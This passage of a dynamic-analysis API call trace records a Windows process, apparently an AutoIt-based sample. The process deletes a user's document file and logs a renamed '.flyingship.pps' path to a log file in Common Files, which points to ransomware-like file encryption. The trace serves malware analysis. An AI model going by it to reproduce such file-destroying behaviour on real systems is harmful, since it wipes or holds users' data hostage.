(in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.682] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\zakf0mr.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0173.684] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.684] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.684] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.684] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.686] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.686] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.686] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.686] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.686] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.686] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.687] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpFilePart=0x0) returned 0x43 [0173.689] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce23480, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 0x90ae18 [0173.689] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\zakf0mr.pps")) returned 1 [0173.692] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce23480, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 0 [0173.692] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.693] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.693] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.693] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.693] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.694] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.694] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.694] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.694] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.695] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.696] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0173.696] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.696] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.697] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0173.697] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x131b, lpOverlapped=0x0) returned 1 [0173.697] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0173.697] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x131b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.697] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0173.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0173.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\n", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 81 [0173.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0173.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0173.698] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x50, lpOverlapped=0x0) returned 1 [0173.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0173.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.698] CloseHandle (hObject=0x138) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.701] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0173.701] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.703] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0173.703] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.703] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.703] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0173.704] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 